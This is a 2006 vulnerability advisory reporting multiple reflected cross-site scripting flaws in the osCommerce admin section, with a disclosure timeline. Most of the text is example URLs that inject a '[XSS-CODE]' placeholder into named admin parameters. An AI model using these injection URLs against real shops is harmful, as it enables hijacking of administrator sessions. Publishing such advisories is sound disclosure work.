########################################## Oscommerce Multiple XSS in admin section. Vendor url:Http://www.oscommerce.com Advisore:http://lostmon.blogspot.com/2006/11/ oscommerce-multiple-xss-in-admin.html Vendor notify:YES Exploit available: YES ########################################## osCommerce contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate multiple params upon submission to multiple scripts in /admin folder.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity. #################### versions #################### Oscommerce -2.2ms2-060817 ################### SOLUTION ################### No solution was available at this time. ################ timeline ################ Discovered:29-10-2006 vendor notify:20-11-2006 vendor response disclosure:21-11-2006 ################# Examples ################# If the server have auth implemented for exploit all of this flaws you need to login , before. ------------------------------- gID param in configuration.php ------------------------------- http://[Victim]/catalog/admin/configuration.php? gID=1">[XSS-CODE]&cID=3 -------------------------- Set param in modules.php -------------------------- http://localhost/catalog/admin/modules.php?selected_box=modules &set=payment">[XSS-CODE]&osCAdminID=034e6def71e10f0ca58029e93fd361e5 http://localhost/catalog/admin/modules.php?set=payment ">[XSS-CODE]&module=pm2checkout http://localhost/catalog/admin/modules.php?set=ordertotal &module=ot_loworderfee">[XSS-CODE]&action=edit -------------------------------------------------- option_order_by ,value_page ,option_page ,products _options_name in products_attributes.php -------------------------------------------------- http://[Victim]/catalog/admin/products_attributes.php? action=update_option&option_id=1&option_order_by="> [XSS-CODE]&products_options_id&option_page=1 http://[Victim]/definitiva/admin/products_attributes.php? option_order_by=products_options_id&value_page=2">[XSS-CODE] http://[Victim]/definitiva/admin/products_attributes.php? option_page=1&option_order_by=products_options_name">[XSS-CODE] http://[Victim]/definitiva/admin/products_attributes.php? action=update_option&option_id=1&option_order_by=products _options_id&option_page=1">[XSS-CODE] http://[Victim]/catalog/admin/products_attributes.php? action=update_option&option_id=1&option_order_by=products _options_id&option_page=1">[XSS-CODE] ---------------------------------------------------- lID param in languages.php --------------------------------------------- http://localhost/definitiva/admin/languages.php?page=1& lID=3">[XSS-CODE]&action=new ------------------------------- selected_box,cID in customers.php ------------------------------- http://localhost/definitiva/admin/customers.php?page=1 &cID=1[XSS-CODE]&action=edit http://[Victim]/catalog/admin/customers.php?selected_box= customers">[XSS-CODE] ------------------------------- spage,zID,sID in geo_zones.php ------------------------------- http://localhost/definitiva/admin/geo_zones.php?zpage=1&zID=1& action=list&spage=1">[XSS-CODE]&sID=1&saction=edit http://localhost/definitiva/admin/geo_zones.php?zpage=1& zID=2">[XSS-CODE]&action=list&spage=1&sID=2&saction=edit http://localhost/definitiva/admin/geo_zones.php?zpage=1 &zID=1&action=list&spage=1&sID=1">[XSS-CODE]&saction=new ######################## €nd ##################### Thnx to Estrella to be my ligth. -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ -- La curiosidad es lo que hace mover la mente....